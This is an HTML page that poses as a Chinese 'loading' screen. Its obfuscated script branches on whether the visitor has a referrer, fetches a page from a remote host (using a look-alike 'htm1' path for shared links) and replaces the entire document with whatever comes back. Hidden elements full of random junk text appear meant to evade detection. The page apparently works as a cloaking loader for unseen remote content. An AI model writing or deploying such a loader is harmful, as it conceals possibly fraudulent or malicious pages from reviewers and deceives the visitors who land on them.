<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ew1m4IC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ew1m4IC .yk46YHO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ew1m4IC .content {
            line-height: 50px;
            text-align: center
        }

        .Ew1m4IC .img {
            width: 100%
        }

        .Ew1m4IC .nBVgNZE {
            text-align: center
        }

        .Ew1m4IC .nBVgNZE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ew1m4IC .nBVgNZE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ew1m4IC .nBVgNZE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ew1m4IC .nBVgNZE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ew1m4IC .nBVgNZE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ew1m4IC .nBVgNZE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ew1m4IC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function SEYUWgtU4i(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var k5RV82 = SEYUWgtU4i('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ k5RV82 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ k5RV82 +".html?a=share";
		}
		
        KIA2chJ=url+"#"+new Date().getTime();
        KIA2chJ && function() {
            $.get(KIA2chJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >KQg5MddP41XFBI50Fu9KgFRbf48mC7ycon655Du6yjlsPMcKGveGWLjPJB4n</b>
<ul style='display:none' >W4lQOEPMBVSEuUTlouf3dI0V5geoaVyEAOQxFcY7xT6</ul>
<b style='display:none' >KQg5MddP41XFBI50Fu9KgFRbf48mC7ycon655Du6yjlsPMcKGveGWLjPJB4n</b><div class="Ew1m4IC">
    <div class="yk46YHO">
        <div class="nBVgNZE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Dug6YZ88OODBBypqWcNSvP</li>
<b style='display:none' >ObDPLAcNba6czxyK6vDzyYbAbBw2ulyOo2M4Lm2gqju13YA8QGGQXJlxj</b>
<a  href='#' style='display:none'>b04Ros7YYtBgZpnFVcywDJqJYj7Jxxj7PRumYaVZDZpp4ut7snH82onsR5WuHN7eqh9ys9P9sIMpuRgxTH</a>
<p  style='display:none'>PbWiuAktLLixJi2BoKofhDXnJVmYdC4O4Uvi7ndMqmDvVOjl</p>
<a  href='#' style='display:none'>b04Ros7YYtBgZpnFVcywDJqJYj7Jxxj7PRumYaVZDZpp4ut7snH82onsR5WuHN7eqh9ys9P9sIMpuRgxTH</a>
<div style='display:none'>yx8RQtkVZaglYR2DpqRmAQWUYYqAOYTqua69yCbX6NEOaQbTe</div></body>
</html>